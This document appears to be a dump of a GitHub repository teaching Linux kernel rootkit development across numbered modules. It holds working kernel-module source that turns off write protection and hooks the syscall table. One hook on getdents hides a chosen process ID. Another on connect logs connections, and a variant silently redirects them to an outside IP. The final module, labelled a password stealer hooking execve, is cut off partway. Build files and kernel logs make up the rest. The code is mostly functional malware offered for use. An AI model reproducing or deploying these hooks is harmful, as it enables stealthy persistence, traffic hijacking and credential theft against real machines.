| Feb 2 12:45:29 ForeignHost kernel: [ 1686.104784] File Found kittyrootkit.mod.o 183 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104786] File Found .kittyrootkit.ko.cmd 184 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104787] File Found .vscode 185 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104790] File Found main.c 186 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104791] File Found test.txt 187 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104793] File Found .. 188 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104794] File Found kittyrootkit.o 189 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104796] File Found .kittyrootkit.mod.o.cmd 190 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104797] File Found main.o 191 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104799] File Found kittyrootkit.mod.c 192 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104800] File Found .RemainingBytes_versions 193 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.104802] File Found . 194 | Feb 2 12:45:29 ForeignHost kernel: [ 1686.921168] File Found . 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | 203 | 204 | 205 | 206 | 207 | 208 | 209 | 210 | Feb 1 22:37:45 ForeignHost kernel: [ 606.944551] Hooks Will Be Set. 211 | Feb 1 22:37:45 ForeignHost kernel: [ 606.944552] System call table at 000000003ea170af 212 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805231] File Found .kittyrootkit.o.cmd 213 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805235] File Found .cache.mk 214 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805237] File Found .main.o.cmd 215 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805239] File Found main.o.ur-safe 216 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805240] File Found testfile 217 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805242] File Found modules.order 218 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805243] File Found kittyrootkit.ko 219 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805245] File Found Module.symvers 220 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805247] File Found kittyrootkit.mod.o 221 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805248] File Found .kittyrootkit.ko.cmd 222 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805250] File Found .vscode 223 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805251] File Found .vscode 224 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805253] File Found main.c 225 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805254] File Found test.txt 226 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805256] File Found .. 227 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805257] File Found kittyrootkit.o 228 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805259] File Found .kittyrootkit.mod.o.cmd 229 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805260] File Found main.o 230 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805262] File Found kittyrootkit.mod.c 231 | Feb 1 22:37:47 ForeignHost kernel: [ 608.805263] File Found .RemainingBytes_versions 232 | Feb 1 22:37:48 ForeignHost kernel: [ 608.805264] File Found . 233 | Feb 1 22:37:48 ForeignHost kernel: [ 610.146290] File Found . 234 | 235 | 236 | 237 | 238 | 239 | 240 | 241 | 242 | 243 | 244 | 245 | 246 | 247 | 248 | 249 | 250 | 251 | 252 | */ -------------------------------------------------------------------------------- /module07_hooking_getdents/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-129 2 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-139 3 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-159 4 | /home/krash/works/rootkitdev/module07_hooking_getdents/main.o-.text-169 5 | -------------------------------------------------------------------------------- /module07_hooking_getdents/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 2 | -------------------------------------------------------------------------------- /module07_hooking_getdents/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module08_hooking_getdents_hidePIDs/echo -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | 14 | MODULE_LICENSE("GPL"); 15 | MODULE_AUTHOR("SourceCodeDeleted"); 16 | MODULE_DESCRIPTION("Hide File Module"); 17 | MODULE_VERSION("1.0"); 18 | 19 | 20 | unsigned long **SYS_CALL_TABLE; 21 | 22 | 23 | 24 | void EnablePageWriting(void){ 25 | write_cr0(read_cr0() & (~0x10000)); 26 | 27 | } 28 | void DisablePageWriting(void){ 29 | write_cr0(read_cr0() | 0x10000); 30 | 31 | } 32 | 33 | 34 | 35 | //define our origional function. 36 | // Credit this author. 37 | // https://zuliu.me/2018/03/22/rootkit/ 38 | // My code was similar but had a few problems. Zuliu had a few better in his code. 39 | /* 40 | int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count); 41 | int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); 42 | */ 43 | 44 | 45 | struct linux_dirent { 46 | unsigned long d_ino; /* Inode number */ 47 | unsigned long d_off; /* Offset to next linux_dirent */ 48 | unsigned short d_reclen; // d_reclen is the way to tell the length of this entry 49 | char d_name[]; // the struct value is actually longer than this, and d_name is variable width. 50 | }*dirp2 , *dirp3 , *retn; // // dirp = directory pointer 51 | 52 | 53 | 54 | 55 | char hide[]="secretfile.txt"; 56 | char HidePID[]= "5779"; 57 | 58 | 59 | asmlinkage int ( *original_getdents ) (unsigned int fd, struct linux_dirent *dirp, unsigned int count); 60 | 61 | //Create Our version of Open Function. 62 | asmlinkage int HookGetDents(unsigned int fd, struct linux_dirent *dirp, unsigned int count){ 63 | 64 | struct linux_dirent *retn, *dirp3; 65 | int Records, RemainingBytes, length; 66 | 67 | Records = (*original_getdents) (fd, dirp, count); 68 | 69 | if (Records <= 0){ 70 | return Records; 71 | } 72 | 73 | retn = (struct linux_dirent *) kmalloc(Records, GFP_KERNEL); 74 | //Copy struct from userspace to our memspace in kernel space 75 | copy_from_user(retn, dirp, Records); 76 | 77 | dirp3 = retn; 78 | RemainingBytes = Records; 79 | 80 | 81 | while(RemainingBytes > 0){ 82 | length = dirp3->d_reclen; 83 | RemainingBytes -= dirp3->d_reclen; 84 | 85 | printk(KERN_INFO "Process Name: %s " , dirp3->d_name ); 86 | 87 | if(strcmp( (dirp3->d_name) , HidePID ) == 0){ 88 | memcpy(dirp3, (char*)dirp3+dirp3->d_reclen, RemainingBytes); 89 | Records -= length; 90 | } 91 | 92 | dirp3 = (struct linux_dirent *) ((char *)dirp3 + dirp3->d_reclen); 93 | 94 | } 95 | // Copy the record back to the origional struct 96 | copy_to_user(dirp, retn, Records); 97 | kfree(retn); 98 | return Records; 99 | } 100 | 101 | 102 | // Set up hooks. 103 | static int __init SetHooks(void) { 104 | // Gets Syscall Table ** 105 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 106 | 107 | printk(KERN_INFO "Hooks Will Be Set.\n"); 108 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 109 | 110 | // Opens the memory pages to be written 111 | EnablePageWriting(); 112 | 113 | // Replaces Pointer Of Syscall_open on our syscall. 114 | original_getdents = (void*)SYS_CALL_TABLE[__NR_getdents]; 115 | SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)HookGetDents; 116 | DisablePageWriting(); 117 | 118 | return 0; 119 | } 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | static void __exit HookCleanup(void) { 128 | 129 | // Clean up our Hooks 130 | EnablePageWriting(); 131 | SYS_CALL_TABLE[__NR_getdents] = (unsigned long*)original_getdents; 132 | DisablePageWriting(); 133 | printk(KERN_INFO "HooksCleaned Up!"); 134 | } 135 | 136 | module_init(SetHooks); 137 | module_exit(HookCleanup); 138 | 139 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-119 2 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-129 3 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-149 4 | /home/krash/works/rootkitdev/module08_hooking_getdents_hidePIDs/main.o-.text-159 5 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 2 | -------------------------------------------------------------------------------- /module08_hooking_getdents_hidePIDs/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module09_hooking_syscall_connect/echo -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | 14 | //#include 15 | #include 16 | #include 17 | #include 18 | 19 | 20 | 21 | MODULE_LICENSE("GPL"); 22 | MODULE_AUTHOR("SourceCodeDeleted"); 23 | MODULE_DESCRIPTION("Intercept Connection Module"); 24 | MODULE_VERSION("1.0"); 25 | 26 | 27 | unsigned long **SYS_CALL_TABLE; 28 | 29 | 30 | 31 | void EnablePageWriting(void){ 32 | write_cr0(read_cr0() & (~0x10000)); 33 | 34 | } 35 | void DisablePageWriting(void){ 36 | write_cr0(read_cr0() | 0x10000); 37 | 38 | } 39 | 40 | #define TCP 0x2 41 | #define UDP 0x1 42 | 43 | 44 | /* 45 | struct sockaddr_in { 46 | __kernel_sa_family_t sin_family; Address family 47 | __be16 sin_port; Port number 48 | struct in_addr sin_addr; Internet address 49 | 50 | Pad to size of `struct sockaddr'. 51 | unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) - 52 | sizeof(unsigned short int) - sizeof(struct in_addr)]; 53 | }; 54 | 55 | In memory Ip addresses are stored like so 56 | 01.0.0.127 == 01 00 00 7f 57 | 58 | */ 59 | 60 | 61 | 62 | 63 | // Place to Store IP String 64 | unsigned char IP[32] = {'\0'}; 65 | 66 | // This function converts internet to Interger and returns String... 67 | char * inet_ntoa(int HexValue){ 68 | memset(IP, 0, sizeof(IP)); 69 | 70 | unsigned char first = (HexValue >> 24) & 0xff; 71 | unsigned char second = (HexValue >> 16) & 0xff; 72 | unsigned char third = (HexValue >> 8) & 0xff; 73 | unsigned char fourth = HexValue & 0xff; 74 | 75 | size_t size = sizeof(IP) / sizeof(IP[0]); 76 | snprintf(IP , size ,"%d.%d.%d.%d" , fourth, third , second , first); 77 | 78 | return IP; 79 | } 80 | 81 | 82 | asmlinkage int ( *original_Connect ) (int fd, struct sockaddr __user *uservaddr, int addrlen); 83 | //Create Our version of Open Function. 84 | asmlinkage int HookConnect(int fd, struct sockaddr __user *uservaddr, int addrlen){ 85 | 86 | struct sockaddr_in addr; 87 | 88 | copy_from_user(&addr, uservaddr, sizeof(struct sockaddr_in)); 89 | 90 | int IPHEX = addr.sin_addr.s_addr; 91 | unsigned short PORT = addr.sin_port; 92 | int PROTO = addr.sin_family; 93 | 94 | char *IpString = inet_ntoa(IPHEX); 95 | 96 | 97 | if(PROTO == TCP){ 98 | printk("TCP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT ); 99 | } 100 | if(PROTO == UDP){ 101 | printk("UDP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT ); 102 | 103 | 104 | 105 | } 106 | 107 | return ( *original_Connect ) (fd, uservaddr, addrlen); 108 | } 109 | 110 | 111 | // Set up hooks. 112 | static int __init SetHooks(void) { 113 | // Gets Syscall Table ** 114 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 115 | 116 | printk(KERN_INFO "Hooks Will Be Set.\n"); 117 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 118 | 119 | // Opens the memory pages to be written 120 | EnablePageWriting(); 121 | 122 | // Replaces Pointer Of Syscall_open on our syscall. 123 | original_Connect = (void*)SYS_CALL_TABLE[__NR_connect]; 124 | SYS_CALL_TABLE[__NR_connect] = (unsigned long*)HookConnect; 125 | DisablePageWriting(); 126 | 127 | return 0; 128 | } 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | static void __exit HookCleanup(void) { 137 | 138 | // Clean up our Hooks 139 | EnablePageWriting(); 140 | SYS_CALL_TABLE[__NR_connect] = (unsigned long*)original_Connect; 141 | DisablePageWriting(); 142 | printk(KERN_INFO "HooksCleaned Up!"); 143 | } 144 | 145 | module_init(SetHooks); 146 | module_exit(HookCleanup); 147 | 148 | 149 | 150 | /* 151 | 152 | https://github.com/torvalds/linux/blob/master/net/socket.c 153 | 154 | 155 | 156 | 157 | int __sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) 158 | { 159 | int ret = -EBADF; 160 | struct fd f; 161 | 162 | f = fdget(fd); 163 | if (f.file) { 164 | struct sockaddr_storage address; 165 | 166 | ret = move_addr_to_kernel(uservaddr, addrlen, &address); 167 | if (!ret) 168 | ret = __sys_connect_file(f.file, &address, addrlen, 0); 169 | if (f.flags) 170 | fput(f.file); 171 | } 172 | 173 | return ret; 174 | } 175 | 176 | SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr, 177 | int, addrlen) 178 | { 179 | return __sys_connect(fd, uservaddr, addrlen); 180 | } 181 | 182 | 183 | enum sock_type { 184 | SOCK_STREAM = 1, 185 | SOCK_DGRAM = 2, 186 | SOCK_RAW = 3, 187 | SOCK_RDM = 4, 188 | SOCK_SEQPACKET = 5, 189 | SOCK_DCCP = 6, 190 | SOCK_PACKET = 10, 191 | }; 192 | 193 | 194 | retn from STRACE 195 | connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused) 196 | 197 | 198 | */ -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-19 2 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-39 3 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-49 4 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-9 5 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 2 | -------------------------------------------------------------------------------- /module09_hooking_syscall_connect/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/Echo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int count = 0; 8 | int main() { 9 | 10 | while(1) 11 | { 12 | count++; 13 | 14 | printf("Tick Tock -- Cycle %d \n", count ); 15 | usleep(1000000); 16 | 17 | } 18 | 19 | } 20 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/echo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SourceCodeDeleted/rootkitdev-linux/b9c9f30533d71e955c14c050605069460c42a771/module10_hooking_syscall_connect_redirect/echo -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #include 13 | 14 | //#include 15 | #include 16 | #include 17 | #include 18 | 19 | 20 | 21 | MODULE_LICENSE("GPL"); 22 | MODULE_AUTHOR("SourceCodeDeleted"); 23 | MODULE_DESCRIPTION("Intercept Connection Module"); 24 | MODULE_VERSION("1.0"); 25 | 26 | 27 | unsigned long **SYS_CALL_TABLE; 28 | 29 | 30 | 31 | void EnablePageWriting(void){ 32 | write_cr0(read_cr0() & (~0x10000)); 33 | 34 | } 35 | void DisablePageWriting(void){ 36 | write_cr0(read_cr0() | 0x10000); 37 | 38 | } 39 | 40 | #define TCP 0x2 41 | #define UDP 0x1 42 | 43 | 44 | /* 45 | struct sockaddr_in { 46 | __kernel_sa_family_t sin_family; Address family 47 | __be16 sin_port; Port number 48 | struct in_addr sin_addr; Internet address 49 | 50 | Pad to size of `struct sockaddr'. 51 | unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) - 52 | sizeof(unsigned short int) - sizeof(struct in_addr)]; 53 | }; 54 | 55 | In memory Ip addresses are stored like so 56 | 01.0.0.127 == 01 00 00 7f 57 | 58 | */ 59 | 60 | 61 | 62 | 63 | // Place to Store IP String 64 | unsigned char IP[32] = {'\0'}; 65 | 66 | // This function converts internet to Interger and returns String... 67 | char * inet_ntoa(int HexValue){ 68 | memset(IP, 0, sizeof(IP)); 69 | 70 | unsigned char first = (HexValue >> 24) & 0xff; 71 | unsigned char second = (HexValue >> 16) & 0xff; 72 | unsigned char third = (HexValue >> 8) & 0xff; 73 | unsigned char fourth = HexValue & 0xff; 74 | 75 | size_t size = sizeof(IP) / sizeof(IP[0]); 76 | snprintf(IP , size ,"%d.%d.%d.%d" , fourth, third , second , first); 77 | 78 | return IP; 79 | } 80 | 81 | 82 | asmlinkage int ( *original_Connect ) (int fd, struct sockaddr __user *uservaddr, int addrlen); 83 | //Create Our version of Open Function. 84 | asmlinkage int HookConnect(int fd, struct sockaddr __user *uservaddr, int addrlen){ 85 | 86 | struct sockaddr_in addr; 87 | 88 | copy_from_user(&addr, uservaddr, sizeof(struct sockaddr_in)); 89 | 90 | int IPHEX = addr.sin_addr.s_addr; 91 | unsigned short PORT = addr.sin_port; 92 | int PROTO = addr.sin_family; 93 | 94 | char *IpString = inet_ntoa(IPHEX); 95 | 96 | 97 | if(PROTO == TCP){ 98 | printk("TCP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT ); 99 | } 100 | if(PROTO == UDP){ 101 | printk("UDP CONNECTION STARTED -- TO %s PORT 0x%x", IpString, PORT ); 102 | 103 | 104 | 105 | } 106 | 107 | if (strcmp(IpString, "127.0.0.1") == 0 && (PORT == 0x5c11 ) ){ 108 | addr.sin_port = 0xbb01; // 443 in hex 109 | addr. sin_addr.s_addr = 0x4ed73ad8; // Google IP in hex 110 | 111 | unsigned short PORT = addr.sin_port; 112 | printk("Redirecting Traffic to Another Port %s :: 0x%x ", IpString, PORT ); 113 | copy_to_user(uservaddr , &addr, sizeof(struct sockaddr_in)); 114 | 115 | 116 | 117 | 118 | } 119 | 120 | 121 | 122 | 123 | 124 | 125 | return ( *original_Connect ) (fd, uservaddr, addrlen); 126 | } 127 | 128 | 129 | // Set up hooks. 130 | static int __init SetHooks(void) { 131 | // Gets Syscall Table ** 132 | SYS_CALL_TABLE = (unsigned long**)kallsyms_lookup_name("sys_call_table"); 133 | 134 | printk(KERN_INFO "Hooks Will Be Set.\n"); 135 | printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE); 136 | 137 | // Opens the memory pages to be written 138 | EnablePageWriting(); 139 | 140 | // Replaces Pointer Of Syscall_open on our syscall. 141 | original_Connect = (void*)SYS_CALL_TABLE[__NR_connect]; 142 | SYS_CALL_TABLE[__NR_connect] = (unsigned long*)HookConnect; 143 | DisablePageWriting(); 144 | 145 | return 0; 146 | } 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | static void __exit HookCleanup(void) { 155 | 156 | // Clean up our Hooks 157 | EnablePageWriting(); 158 | SYS_CALL_TABLE[__NR_connect] = (unsigned long*)original_Connect; 159 | DisablePageWriting(); 160 | printk(KERN_INFO "HooksCleaned Up!"); 161 | } 162 | 163 | module_init(SetHooks); 164 | module_exit(HookCleanup); 165 | 166 | 167 | 168 | /* 169 | 170 | https://github.com/torvalds/linux/blob/master/net/socket.c 171 | 172 | 173 | 174 | 175 | int __sys_connect(int fd, struct sockaddr __user *uservaddr, int addrlen) 176 | { 177 | int ret = -EBADF; 178 | struct fd f; 179 | 180 | f = fdget(fd); 181 | if (f.file) { 182 | struct sockaddr_storage address; 183 | 184 | ret = move_addr_to_kernel(uservaddr, addrlen, &address); 185 | if (!ret) 186 | ret = __sys_connect_file(f.file, &address, addrlen, 0); 187 | if (f.flags) 188 | fput(f.file); 189 | } 190 | 191 | return ret; 192 | } 193 | 194 | SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr, 195 | int, addrlen) 196 | { 197 | return __sys_connect(fd, uservaddr, addrlen); 198 | } 199 | 200 | 201 | enum sock_type { 202 | SOCK_STREAM = 1, 203 | SOCK_DGRAM = 2, 204 | SOCK_RAW = 3, 205 | SOCK_RDM = 4, 206 | SOCK_SEQPACKET = 5, 207 | SOCK_DCCP = 6, 208 | SOCK_PACKET = 10, 209 | }; 210 | 211 | 212 | retn from STRACE 213 | connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("127.0.0.1")}, 16) = -1 ECONNREFUSED (Connection refused) 214 | 215 | 216 | */ -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-19 2 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-39 3 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-49 4 | /home/krash/works/rootkitdev/module09_hooking_syscall_connect/main.o-.text-9 5 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/secretfile.txt: -------------------------------------------------------------------------------- 1 | Too Many Secrets! 2 | -------------------------------------------------------------------------------- /module10_hooking_syscall_connect_redirect/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module11_Hooking_execve/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module11_Hooking_execve/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module11_Hooking_execve/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | #include 13 | #include 14 | 15 | MODULE_LICENSE("GPL"); 16 | MODULE_AUTHOR("SourceCodeDeleted"); 17 | 18 | // Special thanks to sticksxo 19 | 20 | MODULE_DESCRIPTION("Simple Hooking Password Stealer Syscall"); 21 | MODULE_VERSION("1.0"); 22 | 23 | 24 | unsigned long **SYS_CALL_TABLE; 25 | 26 | 27 | void EnablePageWriting(void){ 28 | write_cr0(read_cr0() & (~0x10000)); 29 | 30 | } 31 | void DisablePageWriting(void){ 32 | write_cr0(read_cr0() | 0x10000); 33 | 34 | } 35 | 36 | // EXECVE STRACE 37 | 38 | /* 39 | 40 | # sudo strace -u myusername sudo -k pwd 41 | execve("/bin/ls", ["ls", "-l"], 0x7ffc804d9e98 ) = 0 42 | execve("/usr/bin/sudo", ["sudo", "-k", "pwd"], 0x7ffdff5fec50 24 vars ) = 0 43 | access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) 44 | 45 | ... 46 | ... 47 | ... 48 | write(4, "[sudo] password for myusername: ", 27[sudo] password for myusername: ) = 27 49 | write(4, "*", 1*) = 1 50 | read(4, "s", 1) = 1 51 | write(4, "*", 1*) = 1 52 | read(4, "d", 1) = 1 53 | write(4, "*", 1*) = 1 54 | read(4, "d", 1) = 1 55 | write(4, "*", 1*) = 1 56 | read(4, "a", 1) = 1 57 | write(4, "*", 1*) = 1 58 | read(4, "s", 1) = 1 59 | write(4, "*", 1*) = 1 60 | read(4, "d", 1) = 1 61 | write(4, "*", 1*) = 1 62 | read(4, "\n", 1) = 1 63 | write(4, "\10 \10", ) = 3 64 | write(4, "\10 \10", ) = 3 65 | write(4, "\10 \10", ) = 3 66 | write(4, "\10 \10", ) = 3 67 | write(4, "\10 \10", ) = 3 68 | write(4, "\10 \10", ) = 3 69 | write(4, "\10 \10", ) = 3 70 | write(4, "\10 \10", ) = 3 71 | alarm(0) = 0 72 | write(4, "\n", 1 73 | ) = 1 74 | ... 75 | ... 76 | ... 77 | openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 4 78 | 79 | 80 | */ 81 | /* 82 | 83 | Table 1. The User Space Memory Access API 84 | Function Description 85 | access_ok Checks the validity of the user space memory pointer 86 | get_user Gets a simple variable from user space 87 | put_user Puts a simple variable to user space 88 | clear_user Clears, or zeros, a block in user space 89 | copy_to_user Copies a block of data from the kernel to user space 90 | copy_from_user Copies a block of data from user space to the kernel 91 | strnlen_user Gets the size of a string buffer in user space 92 | strncpy_from_user Copies a string from user space into the kernel 93 | */ 94 | 95 | 96 | char char_buffer[255] = {0}; 97 | // Note: Do not name variables similar, especially globals. 98 | // The argc <-> argz <-> argv differ only in one char. 99 | // and 2d array to hold arguments strings 100 | char argz[255][255] = {0}; 101 | // the count of arguments 102 | size_t argc = 0; 103 | 104 | 105 | char CharBuffer [255] = {'\0'}; 106 | char 